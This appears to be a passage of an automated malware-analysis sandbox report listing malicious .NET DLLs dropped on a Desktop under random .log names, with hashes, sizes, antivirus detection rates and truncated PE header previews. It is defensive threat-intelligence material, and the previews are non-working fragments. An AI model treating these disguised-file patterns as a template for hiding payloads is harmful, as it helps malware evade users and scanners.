Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RfcHRSFf.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 29%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SKvXgoIi.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17% Antivirus: Virustotal, Detection: 41%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\TADrPPcC.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71% Antivirus: Virustotal, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\TLlpvaAw.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 29%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TzzXjEkC.log

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 29%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UkLxLBCd.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17% Antivirus: Virustotal, Detection: 41%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\VjLFuzVH.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VnZQnlzb.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WTjyQsvs.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\apDEhkEl.log

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\cyaNQADQ.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\dUDNIbMu.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eReVdbbp.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\eWtfXNEJ.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\edjwtIzh.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fXYUxCDX.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gcAWdtGq.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\lmQBfErr.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\mvOMxtrw.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nzBVHGUq.log

Download File

